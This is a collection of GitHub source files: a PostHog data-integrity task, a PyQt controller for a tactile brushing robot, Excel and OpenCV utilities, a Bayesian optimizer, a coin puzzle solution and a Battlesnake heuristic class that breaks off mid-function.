+{"seq_id":"39513457049","text":"import json\nfrom collections import Counter, defaultdict\nfrom datetime import timedelta\nfrom typing import Any, Dict, List\n\nimport structlog\nfrom django.db.models.query import Prefetch\nfrom django.utils.timezone import now\n\nfrom posthog.celery import app\nfrom posthog.client import sync_execute\nfrom posthog.models.person import Person\n\nlogger = structlog.get_logger(__name__)\n\n# We check up to LIMIT persons between PERIOD_START..PERIOD_END, in batches of BATCH_SIZE\n# This helps keep the metric \"moving\" as we ship fixes or bugs.\nLIMIT = 100000\nBATCH_SIZE = 500\nPERIOD_START = timedelta(hours=1)\nPERIOD_END = timedelta(days=2)\n\nGET_PERSON_CH_QUERY = \"\"\"\nSELECT id, version, properties FROM person JOIN (\n SELECT id, max(version) as version, max(is_deleted) as is_deleted, team_id\n FROM person\n WHERE team_id IN %(team_ids)s AND id IN (%(person_ids)s)\n GROUP BY team_id, id\n) as person_max ON person.id = person_max.id AND person.version = person_max.version AND person.team_id = person_max.team_id\nWHERE team_id IN %(team_ids)s\n AND person_max.is_deleted = 0\n AND id IN (%(person_ids)s)\n\"\"\"\n\nGET_DISTINCT_IDS_CH_QUERY = \"\"\"\nSELECT distinct_id, argMax(person_id, version) as person_id\nFROM person_distinct_id2\nWHERE team_id IN %(team_ids)s\nGROUP BY team_id, distinct_id\nHAVING argMax(is_deleted, version) = 0 AND person_id IN (%(person_ids)s)\n\"\"\"\n\n\n@app.task(max_retries=1, ignore_result=True)\ndef verify_persons_data_in_sync(\n period_start: timedelta = PERIOD_START,\n period_end: timedelta = PERIOD_END,\n limit: int = LIMIT,\n emit_results: bool = True,\n) -> Counter:\n # :KLUDGE: Rather than filter on created_at directly which is unindexed, we look up the latest value in 'id' column\n # and leverage that to narrow down filtering in an index-efficient way\n max_pk = Person.objects.filter(created_at__lte=now() - period_start).latest(\"id\").id\n person_data = list(\n Person.objects.filter(\n pk__lte=max_pk,\n pk__gte=max_pk - LIMIT * 5,\n created_at__gte=now() - period_end,\n ).values_list(\"id\", \"uuid\", \"team_id\")[:limit]\n )\n person_data.sort(key=lambda row: row[2]) # keep persons from same team together\n\n results = Counter(\n {\n \"total\": 0,\n \"missing_in_clickhouse\": 0,\n \"version_mismatch\": 0,\n \"properties_mismatch\": 0,\n \"distinct_ids_mismatch\": 0,\n \"properties_mismatch_same_version\": 0,\n }\n )\n for i in range(0, len(person_data), BATCH_SIZE):\n batch = person_data[i : i + BATCH_SIZE]\n results += _team_integrity_statistics(batch)\n\n if emit_results:\n _emit_metrics(results)\n\n return results\n\n\ndef _team_integrity_statistics(person_data: List[Any]) -> Counter:\n person_ids = [id for id, _, _ in person_data]\n person_uuids = [uuid for _, uuid, _ in person_data]\n team_ids = list(set(team_id for _, _, team_id in person_data))\n\n # :TRICKY: To speed up processing, we fetch all models in batch at once and store results in dictionary indexed by person uuid\n pg_persons = _index_by(\n list(\n Person.objects.filter(id__in=person_ids).prefetch_related(\n Prefetch(\"persondistinctid_set\", to_attr=\"distinct_ids_cache\")\n )\n ),\n lambda p: p.uuid,\n )\n\n ch_persons = _index_by(\n sync_execute(GET_PERSON_CH_QUERY, {\"person_ids\": person_uuids, \"team_ids\": team_ids}),\n lambda row: row[0],\n )\n\n ch_distinct_ids_mapping = _index_by(\n sync_execute(\n GET_DISTINCT_IDS_CH_QUERY,\n {\"person_ids\": person_uuids, \"team_ids\": team_ids},\n ),\n lambda row: row[1],\n flat=False,\n )\n\n result: Counter = Counter()\n for _pk, uuid, team_id in person_data:\n # Person was deleted in the middle of processing, can ignore\n if uuid not in pg_persons:\n continue\n result[\"total\"] += 1\n pg_person = pg_persons[uuid]\n if uuid not in ch_persons:\n result[\"missing_in_clickhouse\"] += 1\n logger.info(\"Found person missing in clickhouse\", team_id=team_id, uuid=uuid)\n continue\n _, ch_version, ch_properties = ch_persons[uuid]\n ch_properties = json.loads(ch_properties)\n if ch_version != pg_person.version:\n result[\"version_mismatch\"] += 1\n logger.info(\n \"Found version mismatch\",\n team_id=team_id,\n uuid=uuid,\n properties=pg_person.properties,\n ch_properties=ch_properties,\n )\n if pg_person.properties != ch_properties:\n result[\"properties_mismatch\"] += 1\n logger.info(\n \"Found properties mismatch\",\n team_id=team_id,\n uuid=uuid,\n properties=pg_person.properties,\n ch_properties=ch_properties,\n )\n\n # :KLUDGE: Verify business logic. If versions are in sync so should properties be.\n if ch_version != 0 and ch_version == pg_person.version and pg_person.properties != ch_properties:\n result[\"properties_mismatch_same_version\"] += 1\n\n pg_distinct_ids = list(sorted(map(str, pg_person.distinct_ids)))\n ch_distinct_id = list(sorted(str(distinct_id) for distinct_id, _ in ch_distinct_ids_mapping.get(uuid, [])))\n if pg_distinct_ids != ch_distinct_id:\n result[\"distinct_ids_mismatch\"] += 1\n return result\n\n\ndef _emit_metrics(integrity_results: Counter) -> None:\n from statshog.defaults.django import statsd\n\n for key, value in integrity_results.items():\n statsd.gauge(f\"posthog_person_integrity_{key}\", value)\n\n\ndef _index_by(collection: List[Any], key_fn: Any, flat: bool = True) -> Dict:\n result: Dict = {} if flat else defaultdict(list)\n for item in collection:\n if flat:\n result[key_fn(item)] = item\n else:\n result[key_fn(item)].append(item)\n return result\n","repo_name":"PostHog/posthog","sub_path":"posthog/tasks/verify_persons_data_in_sync.py","file_name":"verify_persons_data_in_sync.py","file_ext":"py","file_size_in_byte":6017,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"}
+{"seq_id":"70506573929","text":"# Created by \"EdgardoCS\" at 22-Aug-23\n__github__ = \"https://github.com/EdgardoCS\"\n__email__ = \"edgardo.silva@uv.cl\"\n\nimport os\nimport sys\nimport time\nimport queue\nimport random\nimport traceback\nimport threading\nimport screeninfo\nimport numpy as np\nimport pandas as pd\nfrom axidraw import brush\n\nfrom PyQt6.QtCore import *\nfrom PyQt6 import QtWidgets\nfrom PyQt6.uic import loadUi\nfrom PyQt6.QtGui import QScreen\nfrom PyQt6.QtWidgets import QMainWindow, QApplication, QInputDialog, QFileDialog, QWidget\n\n\nclass WorkerSignals(QObject):\n \"\"\"\n Defines the signals available from a running worker thread.\n Supported signals are:\n finished\n No data\n error\n tuple (exctype, value, traceback.format_exc() )\n result\n object data returned from processing, anything\n progress\n int indicating % progress\n \"\"\"\n finished = pyqtSignal()\n error = pyqtSignal(tuple)\n result = pyqtSignal(object)\n progress = pyqtSignal(int)\n\n\nclass vasWorker(QRunnable):\n def __init__(self, fn, *args, **kwargs):\n super(vasWorker, self).__init__()\n # Store constructor arguments (re-used for processing)\n self.fn = fn\n self.args = args\n self.kwargs = kwargs\n self.signals = WorkerSignals()\n\n # Add the callback to our kwargs\n self.kwargs['progress_callback'] = self.signals.progress\n\n @pyqtSlot()\n def run(self):\n \"\"\"\n Initialise the runner function with passed args, kwargs.\n \"\"\"\n try:\n result = self.fn(*self.args, **self.kwargs)\n except:\n traceback.print_exc()\n exctype, value = sys.exc_info()[:2]\n self.signals.error.emit((exctype, value, traceback.format_exc()))\n else:\n self.signals.result.emit(result) # Return the result of the processing\n finally:\n self.signals.finished.emit() # Done\n\n\nclass Worker(QRunnable):\n \"\"\"\n Worker thread\n Inherits from QRunnable to handler worker thread setup, signals and wrap-up.\n\n :param callback: The function callback to run on this worker thread. Supplied args and\n kwargs will be passed through to the runner.\n :type callback: function\n :param args: Arguments to pass to the callback function\n :param kwargs: Keywords to pass to the callback function\n \"\"\"\n\n def __init__(self, fn, *args, **kwargs):\n super(Worker, self).__init__()\n # Store constructor arguments (re-used for processing)\n self.fn = fn\n self.args = args\n self.kwargs = kwargs\n self.signals = WorkerSignals()\n\n # Add the callback to our kwargs\n self.kwargs['progress_callback'] = self.signals.progress\n\n @pyqtSlot()\n def run(self):\n \"\"\"\n Initialise the runner function with passed args, kwargs.\n \"\"\"\n # Retrieve args/kwargs here; and fire processing using them\n try:\n result = self.fn(*self.args, **self.kwargs)\n except:\n traceback.print_exc()\n exctype, value = sys.exc_info()[:2]\n self.signals.error.emit((exctype, value, traceback.format_exc()))\n else:\n self.signals.result.emit(result) # Return the result of the processing\n finally:\n self.signals.finished.emit() # Done\n\n\nclass AxiDraw(threading.Thread):\n \"\"\"\n AxiDraw main thread\n Set of functions to communicate with axidraw device, can manipulate port (open, close) and send\n signals to initialize movement(move_x, move_y, pen_up, pen_down.\n \"\"\"\n\n def __init__(self, q_in, q_out):\n threading.Thread.__init__(self)\n self.serial_port = None\n self.running = True\n self.serial_status = False\n self.running = True\n self.q_in = q_in\n self.q_out = q_out\n\n def stop(self):\n self.running = False\n # Here we need to close the serial port!\n print('Axidraw thread stopped')\n\n def run(self):\n while self.running:\n msg = self.q_in.get()\n if msg == 'open_port':\n port = brush.findPort() # Success!! Axidraw founded in COMPort\n if port:\n self.serial_port, self.serial_status = brush.openPort(port)\n if self.serial_port:\n if self.serial_status:\n self.q_out.put(self.serial_port.name, self.serial_status)\n # return self.serial_port.name\n else:\n self.q_out.put(self.serial_port.name)\n # return self.serial_port.name\n else:\n print('Could not find a port with an AxiDraw connected')\n self.q_out.put('not-OK')\n else:\n print('Could not find a port with an AxiDraw connected')\n self.q_out.put('not-OK')\n\n if msg == 'close_port':\n port = brush.findPort()\n if port is None:\n print('Could not find a port with an AxiDraw connected')\n else:\n print('Closing port', port)\n self.serial_port = brush.closePort(port)\n\n if msg[0] == 'hellofriend.mov':\n brush.sendEnableMotors(self.serial_port, 2)\n speed = msg[1]\n direction = msg[2]\n distance = msg[3]\n # print('Brushing at ' + str(speed) + ' cm/s')\n if direction == 'Left to Right':\n brush.pen_down(self.serial_port)\n brush.move_x(self.serial_port, distance, speed)\n brush.pen_up(self.serial_port)\n brush.move_x(self.serial_port, -distance, 3)\n elif direction == 'Right to Left':\n brush.pen_down(self.serial_port)\n brush.move_x(self.serial_port, -distance, 3)\n brush.pen_up(self.serial_port)\n brush.move_x(self.serial_port, distance, speed)\n\n # circular movement\n elif direction == 'CW':\n brush.pen_down(self.serial_port)\n brush.move_circular(self.serial_port, speed, 0.67, 1, direction)\n brush.pen_up(self.serial_port)\n elif direction == 'ACW':\n brush.pen_down(self.serial_port)\n brush.move_circular(self.serial_port, speed, 0.67, 1, direction)\n brush.pen_up(self.serial_port)\n\n brush.sendDisableMotors(self.serial_port)\n self.q_out.put('OK')\n\n\n# Queue params:\nq_to_ad = queue.Queue()\nq_from_ad = queue.Queue()\naxidraw = AxiDraw(q_to_ad, q_from_ad)\n\naxidraw.daemon = True\naxidraw.start()\n\nWorker.daemon = True\n\n\nclass secondWindow(QMainWindow):\n # VAS UI\n def __init__(self, parent=None):\n super(secondWindow, self).__init__()\n loadUi(\"gui/vas.ui\", self)\n\n self.vasSlider.valueChanged.connect(self.updateDisplay)\n self.vasSubmit.clicked.connect(self.getValues)\n\n def getValues(self):\n # Get values from Slider and print results in console\n # TODO: Store data and export (if exists: append to csv)\n print(self.vasSlider.value())\n # print(q_to_ad.put(['hellofriend.mov', trial, direction, distance])) #EXPORT\n\n self.close()\n\n def updateDisplay(self):\n # Update digital display as the sliders moves\n self.vasCurrent.display(self.vasSlider.value())\n\n\nclass MainUI(QMainWindow):\n # Main UI\n def __init__(self):\n super(MainUI, self).__init__()\n loadUi(\"gui/mainGui.ui\", self)\n\n # Threading neccesary for worker (another thread used in for loop during stimulation\n self.threadpool = QThreadPool()\n\n self.statusBar.showMessage('Ready')\n\n # bind buttons to functions\n self.loadExperiment.triggered.connect(self.loadExperimentAction)\n self.saveExperiment.triggered.connect(self.saveExperimentAction)\n self.loadSubject.triggered.connect(self.loadSubjectAction)\n self.saveSubject.triggered.connect(self.saveSubjectAction)\n self.ResetButton.clicked.connect(self.resetSubject)\n self.BeginButton.clicked.connect(self.startExperiment)\n self.ConnectButton.clicked.connect(self.connectDevice)\n self.actionExit.triggered.connect(QtWidgets.QApplication.quit)\n self.clearButton.clicked.connect(self.clearAction)\n self.clearConsole.clicked.connect(self.clearConsoleAction)\n\n def printToConsole(self, text):\n \"\"\"\n Print functions output into UI console (PlainText)\n :param self:\n :param text: text(str)\n \"\"\"\n\n self.ConsoleOutput.appendPlainText('- ' + text)\n self.ConsoleOutput.ensureCursorVisible()\n\n def loadExperimentAction(self):\n # load a experiment file\n filename = QFileDialog.getOpenFileName(self,\n caption=\"Open Experiment\",\n filter=\"Comma Separated Values CSV Files (*.csv)\"\n )\n\n if filename[0] == \"\":\n return\n data = pd.read_csv(filename[0], header=None)\n self.updateExperiment(data)\n\n def updateExperiment(self, data):\n \"\"\"\n Update experiment UI with loaded data\n :param self:\n :param data: incoming data from LoadExperimentAction function, python list\n \"\"\"\n self.movementPath.setCurrentText(data[1][0])\n self.bodySite.setCurrentText(data[1][1])\n self.movementDirection.setCurrentText(data[1][2])\n self.velocitiesInput.setText(data[1][3])\n self.distanceInput.setText(data[1][4])\n self.repetitionsInput.setText(data[1][5])\n self.intertrialIntput.setText(data[1][6])\n self.vastimeInput.setText(data[1][7])\n\n def saveExperimentAction(self):\n # save a experiment file\n data = [self.movementPath.currentText(),\n self.bodySite.currentText(),\n self.movementDirection.currentText(),\n self.velocitiesInput.displayText(),\n self.distanceInput.displayText(),\n self.repetitionsInput.displayText(),\n self.intertrialIntput.displayText(),\n self.vastimeInput.displayText()]\n\n self.printToConsole('Saving data')\n filename = QFileDialog.getSaveFileName(\n caption=\"Save Experiment\",\n filter=\"Comma Separated Values CSV Files (*.csv)\",\n initialFilter=\"csv\"\n )\n\n if filename[0] == \"\":\n return\n\n indexRow = [\"Path\", \"Site\",\n \"Movement\", \"Velocity\",\n \"Distance\", \"Repetitions\",\n \"VasTime\", \"InterTime\"]\n dataToCsv = pd.DataFrame(data, index=indexRow)\n dataToCsv.to_csv(str(filename[0]), header=False)\n\n def loadSubjectAction(self):\n # load a subject file\n filename = QFileDialog.getOpenFileName(self,\n caption=\"Open Experiment\",\n filter=\"Comma Separated Values CSV Files (*.csv)\"\n )\n\n if filename[0] == \"\":\n return\n\n data = pd.read_csv(filename[0], header=None)\n self.updateSubject(data)\n\n def saveSubjectAction(self):\n # save a subject file\n data = [self.subjectInput.displayText(),\n self.ageInput.displayText(),\n self.genderInput.currentText(),\n self.handInput.currentText()]\n\n self.printToConsole('Saving data')\n filename = QFileDialog.getSaveFileName(\n caption=\"Save Experiment\",\n filter=\"Comma Separated Values CSV Files (*.csv)\",\n initialFilter=\"csv\"\n )\n\n if filename[0] == \"\":\n return\n\n indexRow = [\"Subject\", \"Age\",\n \"Gender\", \"Handeness\"]\n dataToCsv = pd.DataFrame(data, index=indexRow)\n dataToCsv.to_csv(str(filename[0]), header=False)\n\n def updateSubject(self, data):\n self.subjectInput.setText(data[1][0])\n self.ageInput.setText(data[1][1])\n self.genderInput.setCurrentText(data[1][2])\n self.handInput.setCurrentText(data[1][3])\n\n def resetSubject(self):\n self.subjectInput.setText(\"\")\n self.ageInput.setText(\"\")\n self.genderInput.setCurrentIndex(0)\n self.handInput.setCurrentIndex(0)\n\n def clearAction(self):\n self.movementPath.setCurrentIndex(0)\n self.bodySite.setCurrentIndex(0)\n self.movementDirection.setCurrentIndex(0)\n self.velocitiesInput.setText(\"\")\n self.distanceInput.setText(\"\")\n self.repetitionsInput.setText(\"\")\n self.intertrialIntput.setText(\"\")\n self.vastimeInput.setText(\"\")\n\n def clearConsoleAction(self):\n self.ConsoleOutput.clear()\n\n def connectDevice(self):\n q_to_ad.put('open_port')\n answer = q_from_ad.get()\n if answer[:3] == 'COM':\n # print(answer)\n # TODO: read all incoming PORTs more elegantly\n\n self.connectedBox.setCheckable(True)\n self.connectedBox.setChecked(True)\n\n self.poweredBox.setCheckable(True)\n self.poweredBox.setChecked(True)\n\n self.ConnectButton.setEnabled(False)\n\n self.connectedBox.setEnabled(False)\n self.poweredBox.setEnabled(False)\n\n def execute_brushing(self, progress_callback):\n \"\"\"\n new Thread! Execute trials and send signals to brush through Queue\n :param self\n :param progress_callback: Real-time feedback from worker\n \"\"\"\n self.BeginButton.setEnabled(False)\n trialsRnd = []\n data = self.getExperimentData()\n\n direction = data[2]\n trials = data[3].split(\";\")\n distance = int(data[4])\n reps = int(data[5])\n interTime = int(data[6])\n VasTime = int(data[7])\n\n totalTrials = len(trials) * reps\n trialCount = 1\n\n trials = [eval(i) for i in trials]\n\n for i in range(0, reps):\n trialsRnd.append(random.sample(trials, len(trials)))\n for cycle in trialsRnd:\n for trial in cycle:\n answer = None\n self.printToConsole('Brushing at ' + str(trial) + ' cm/s')\n # add from here to csv, combine with vas results?\n q_to_ad.put(['hellofriend.mov', trial, direction, distance])\n answer = q_from_ad.get()\n progress_callback.emit(totalTrials - trialCount)\n trialCount += 1\n \"\"\"\n flag1 = time.time()\n flag2 = time.time()\n \n while trialCount < totalTrials:\n if flag2 - flag1 >= VasTime:\n flag1 = flag2\n flag2 = time.time()\n trialCount += 1\n else:\n flag2 = time.time()\n else:\n \"\"\"\n time.sleep(interTime)\n self.BeginButton.setEnabled(True)\n return 'Done'\n\n def newWindow(self):\n self.w = secondWindow()\n self.w.show()\n\n def print_output(self, s):\n if s:\n print(s)\n\n def thread_complete(self):\n self.printToConsole(\"Tactile stimulation complete\")\n\n def progress_fn(self, n):\n self.printToConsole('Trials left: ' + str(n))\n self.newWindow()\n\n def startExperiment(self):\n if self.ConnectButton.isEnabled():\n self.printToConsole('MultiTAC is not connected, please connect')\n else:\n worker = Worker(self.execute_brushing)\n worker.signals.result.connect(self.print_output)\n worker.signals.finished.connect(self.thread_complete)\n worker.signals.progress.connect(self.progress_fn)\n # Execute\n self.threadpool.start(worker)\n\n def getExperimentData(self):\n # self.printToConsole('Starting Experiment')\n data = [self.movementPath.currentText(),\n self.bodySite.currentText(),\n self.movementDirection.currentText(),\n self.velocitiesInput.displayText(),\n self.distanceInput.displayText(),\n self.repetitionsInput.displayText(),\n self.intertrialIntput.displayText(),\n self.vastimeInput.displayText()]\n return data\n\n\nif __name__:\n debugger = True\n\n if debugger:\n app = QApplication(sys.argv)\n qt_app = MainUI()\n qt_app.show()\n app.exec()\n","repo_name":"EdgardoCS/BrushGui","sub_path":"MultiTAC.py","file_name":"MultiTAC.py","file_ext":"py","file_size_in_byte":16898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"2234729535","text":"from openpyxl import Workbook\r\nimport string\r\nimport os\r\n\r\nfile_name = []\r\nfolder = \"C:/Users/Turi/PycharmProjects/test\"\r\nfor file in os.listdir(folder):\r\n if file.endswith(\".txt\"):\r\n file_name.append(file)\r\n\r\n\r\nworkbook = Workbook()\r\nfor i in file_name:\r\n workbook.create_sheet(i)\r\n\r\nabc = string.ascii_uppercase\r\n\r\nfor txt_file in file_name:\r\n row = 1\r\n column = 0\r\n header = True\r\n sheet = workbook[txt_file]\r\n with open(txt_file, \"r\") as file:\r\n lines = file.readlines()\r\n for line in lines:\r\n line = line.split('|')\r\n if len(line) > 20 and line[1].startswith(\"P\") and header:\r\n for header_data in line:\r\n cell = abc[column] + str(row)\r\n sheet[cell] = header_data\r\n column += 1\r\n header = False\r\n row += 1\r\n if len(line) > 20 and line[1].startswith(\"3\"):\r\n column = 0\r\n for data in line:\r\n cell = abc[column] + str(row)\r\n sheet[cell] = data\r\n column += 1\r\n column = 0\r\n row += 1\r\n\r\nworkbook.save(filename=\"bence.xlsx\")\r\n\r\n","repo_name":"TurcsanyAdam/Bence_excell","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"32335044162","text":"for _ in range(int(input())):\r\n coin = sorted(list(map(int, input().split()))[1:])\r\n flag = True\r\n\r\n for i in range(1, len(coin)):\r\n if coin[i - 1] * 2 > coin[i]:\r\n flag = False\r\n break\r\n\r\n print(f\"Denominations: \" + \" \".join(map(str, coin)))\r\n print(\"Good coin denominations!\" if flag else \"Bad coin denominations!\")\r\n print()","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Bronze/26350.py","file_name":"26350.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33130369456","text":"import numpy as np\n\nfrom ..bayes_opt import BayesianOptimization\nfrom ..bayes_opt.helpers import acq_max, UtilityFunction\nfrom random import random\nfrom sklearn.preprocessing import StandardScaler\nfrom ..other import random_sample\nimport datetime\n\ndef noop(*kargs, **kwargs):\n # stub function for bo\n return None\n\n\nclass BayesianOptimizer():\n def __init__(self, space, conf={}):\n conf = {\n **conf,\n 'pbounds': space, #conf bounds\n }\n self.space = space\n self.conf = conf\n#########conf contains acq, use; else use default\n self.acq = conf.get('acq', 'ei')\n self.kappa = conf.get('kappa', 2.576)\n self.xi = conf.get('xi', 0.0)\n self.history_data=np.loadtxt('memory_km/datasetforGP.txt')\n self.history_data_y=np.loadtxt('memory_km/dataset.txt')\n self.xx=self.history_data[:]\n self.yy=-self.history_data_y[:,32] # -y\n print('space=',self.space)\n x=self.xx[:1480,:] # wc 1310 pr 1225\n # print(x)\n # StandardScaler= x-mean/var normal\n standardscaler = StandardScaler()\n self.scaler=standardscaler.fit(x)\n x = self.scaler.transform(x)\n\n # print(x)\n\n try:\n del conf['acq'], conf['kappa'], conf['xi']\n except:\n pass\n #print(self.space)\n self.bo = BayesianOptimization(**self._make_config(conf))\n starttime1 = datetime.datetime.now()\n\n self.bo.gp.fit(x, self.yy)\n endtime1 = datetime.datetime.now()\n duringtime1 = endtime1 - starttime1\n\n print('GP model trained..time',duringtime1)\n # print('show make config:')\n # print(self._make_config(conf))\n\n def _make_config(self, conf):\n return {\n **conf,\n 'f': noop\n }\n\n def add_observation(self, ob):\n # ob: (x, y) while x is argument dict\n # _x:{'key1':v1,'key2':v2,.....}\n _x, y = ob\n # print('show ob_x, i.e, sampled_config_numeric:')\n # print(_x)\n # print('show ob.y, i.e, metric_result:')\n # print(y)\n # dict to tuple regarding keys in self.space\n x = []\n for k in self.space.keys():\n x.append(_x[k])\n# x=[conf1,conf2,...]\n # print(x,y)\n # add ob into bo space\n #\n # self.bo.space._Yview=[-240,-240,-121.41]\n try:\n print('bo space before add observation',self.bo.space)\n #space.add_observation(x, y) is define in the TargetSpace.py file\n self.bo.space.add_observation(x, y)\n except KeyError as e:\n # get exception message\n msg, = e.args\n raise Exception(msg)\n # print('show ob.space.X,only values no keys:')\n # print(self.bo.space.X)\n # print('show ob.space.Y:')\n # print(self.bo.space.Y)\n # XX=self.bo.space.X\n # YY=self.bo.space.Y\n # XX=self.xx\n # YY=self.yy\n\n # XX.append(self.bo.space.X)\n # YY.append(self.bo.space.Y)\n # print('XX and YY-----------')\n\n# todo operate in here!!\n# self.bo.gp.fit(XX,YY)\n\n\n def get_conf(self):\n acq = self.acq\n kappa = self.kappa\n xi = self.xi\n scaler=self.scaler\n # bo recalculates next best conf\n # codes below are adapted from implementation of bo.maximize\n\n # assert self.bo.space.Y is not None and len(\n # self.bo.space.Y) > 0, 'at least one observation is required before asking for next configuration'\n if self.bo.space.Y is None or len(self.bo.space.Y) == 0:\n x_max = self.bo.space.random_points(1)[0]\n else:\n\n print(' start find max')\n starttime = datetime.datetime.now()\n x_max = acq_max(\n ac=UtilityFunction(\n kind=acq,\n kappa=kappa,\n xi=xi,\n scaler=scaler\n ).utility,\n gp=self.bo.gp,\n scaler=self.scaler,\n y_max=self.bo.space.Y.max(),\n bounds=self.bo.space.bounds,\n random_state=self.bo.random_state,\n **self.bo._acqkw\n )\n\n print(' compelete find max')\n endtime = datetime.datetime.now()\n duringtime = endtime - starttime\n print(duringtime)\n\n # print('x_max=',x_max)\n # check if x_max repeats\n if x_max in self.bo.space:\n x_max = self.bo.space.random_points(1)[0]\n\n # print('show xmax from acqmax():')\n # print(x_max)\n return self._convert_to_dict(x_max)\n\n def _convert_to_dict(self, x_array):\n # print('show self.space, not self.bo.space, should be{'':()}:')\n # print(self.space)\n return dict(zip(self.space, x_array))\n\n\nclass ConfigedBayesianOptimizer(BayesianOptimizer):\n # Processing parameter space: Continuous and discrete\n def __init__(self, config, bo_conf={}):\n self._config = {**config}\n #print(self._config)\n bo_space = {}\n for k, v in self._config.items():\n v_range = v.get('range')\n if v_range: # discrete ranged parameter\n bo_space[k] = (0, len(v_range)) # note: right-close range\n else:\n bo_space[k] = (v['min'], v['max'])\n #print(bo_space)\n #print(bo_conf)\n super().__init__(bo_space, bo_conf)\n\n # get conf and convert to legal config\n def get_conf(self):\n sample = super().get_conf()\n print('show sample from father\\'s get_conf:')\n print(sample)\n # first is continuous value, second is translated\n return sample, self._translate(sample)\n\n def random_sample(self):\n result = {}\n for k, v in self._config.items():\n v_range = v.get('range')\n if v_range:\n result[k] = random() * len(v_range)\n else:\n minn, maxx = v.get('min'), v.get('max')\n result[k] = random() * (maxx - minn) + minn\n return result, self._translate(result)\n\n def _translate(self, sample):\n result = {}\n # orders in sample are the same as in _config dict\n # see: https://github.com/fmfn/BayesianOptimization/blob/d531dcab1d73729528afbffd9a9c47c067de5880/bayes_opt/target_space.py#L49\n # self.bounds = np.array(list(pbounds.values()), dtype=np.float)\n for sample_value, (k, v) in zip(sample.values(), self._config.items()):\n v_range = v.get('range')\n if v_range:\n try:\n index = int(sample_value)\n if index == len(v_range):\n index -= 1\n result[k] = v_range[index]\n except Exception as e:\n print('ERROR!')\n print(k, sample_value)\n print(v_range)\n raise e\n else:\n is_float = v.get('float', False)\n result[k] = sample_value if is_float else int(sample_value)\n #print(result)\n return result\n","repo_name":"wiluen/DeepCAT","sub_path":"test_kit/ultimate/lib/optimizer/bo.py","file_name":"bo.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72177412648","text":"#Trackbar find the specific Value HSV\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef callback(x):\r\n pass\r\n\r\ncv2.namedWindow('Input_Range')\r\n\r\nilowH = 0\r\nihighH = 360\r\n\r\nilowS = 0\r\nihighS = 255\r\n\r\nilowV = 0\r\nihighV = 255\r\n\r\n#create trackbars for color change\r\ncv2.createTrackbar('low_HUE','Input_Range',ilowH,360,callback)\r\ncv2.createTrackbar('high_HUE','Input_Range',ihighH,360,callback)\r\n\r\ncv2.createTrackbar('low_Saturate','Input_Range',ilowS,255,callback)\r\ncv2.createTrackbar('high_Saturate','Input_Range',ihighS,255,callback)\r\n\r\ncv2.createTrackbar('low_Intensity','Input_Range',ilowV,255,callback)\r\ncv2.createTrackbar('high_Intensity','Input_Range',ihighV,255,callback)\r\n\r\nfile_path = 'Board.jpg'\r\n\r\nwhile(1):\r\n cap = cv2.imread(file_path,1)\r\n \r\n #get Trackbar positions\r\n ilowH = cv2.getTrackbarPos('low_HUE','Input_Range')\r\n ihighH = cv2.getTrackbarPos('high_HUE','Input_Range')\r\n ilowS = cv2.getTrackbarPos('low_Saturate','Input_Range')\r\n ihighS = cv2.getTrackbarPos('high_Saturate','Input_Range')\r\n ilowV = cv2.getTrackbarPos('low_Intensity','Input_Range')\r\n ihighV = cv2.getTrackbarPos('high_Intensity','Input_Range')\r\n \r\n hsv = cv2.cvtColor(cap, cv2.COLOR_BGR2HSV)\r\n cv2.imshow('RGB',cap)\r\n lower_hsv = np.array([ilowH,ilowS,ilowV])\r\n higher_hsv = np.array([ihighH,ihighS,ihighV])\r\n mask = cv2.inRange(hsv,lower_hsv,higher_hsv)\r\n #cv2.imshow('mask',mask)\r\n \r\n cap = cv2.bitwise_and(cap,cap,mask=mask)\r\n \r\n #show Thresholded image\r\n cv2.imshow('cap',cap)\r\n \r\n #print(ilowH,ilowS,ilowV)\r\n if(cv2.waitKey(1) & 0xFF == ord('q')):\r\n break\r\ncv2.destroyAllWindows()\r\n","repo_name":"ema2541/WDProject_RobotArm","sub_path":"02_find_upper_lower_color.py","file_name":"02_find_upper_lower_color.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"74479463529","text":"import numpy as np\nimport random\n\nclass MyBattlesnakeHeuristics:\n '''\n The BattlesnakeHeuristics class allows you to define handcrafted rules of the snake.\n '''\n FOOD_INDEX = 0\n def __init__(self):\n pass\n \n def go_to_food_if_close(self, state, json):\n '''\n Example heuristic to move towards food if it's close to you.\n '''\n # Get the position of the snake head\n your_snake_body = json[\"you\"][\"body\"]\n i, j = your_snake_body[0][\"y\"], your_snake_body[0][\"x\"]\n \n # Set food_direction towards food\n food = state[:, :, self.FOOD_INDEX]\n \n # Note that there is a -1 border around state so i = i + 1, j = j + 1\n if -1 in state:\n i, j = i+1, j+1\n \n food_direction = None\n if food[i-1, j] == 1:\n food_direction = 0 # up\n if food[i+1, j] == 1:\n food_direction = 1 # down\n if food[i, j-1] == 1:\n food_direction = 2 # left\n if food[i, j+1] == 1:\n food_direction = 3 # right\n return food_direction\n \n def run(self, state, snake_id, turn_count, health, json, action):\n '''\n The main function of the heuristics.\n \n Parameters:\n -----------\n `state`: np.array of size (map_size[0]+2, map_size[1]+2, 1+number_of_snakes)\n Provides the current observation of the gym.\n Your target snake is state[:, :, snake_id+1]\n \n `snake_id`: int\n Indicates the id where id \\in [0...number_of_snakes]\n \n `turn_count`: int\n Indicates the number of elapsed turns\n \n `health`: dict\n Indicates the health of all snakes in the form of {int: snake_id: int:health}\n \n `json`: dict\n Provides the same information as above, in the same format as the battlesnake engine.\n\n `action`: np.array of size 4\n The qvalues of the actions calculated. The 4 values correspond to [up, down, left, right]\n '''\n log_string = \"\"\n # The default `best_action` to take is the one that provides has the largest Q value.\n # If you think of something else, you can edit how `best_action` is calculated\n best_action = int(np.argmax(action))\n 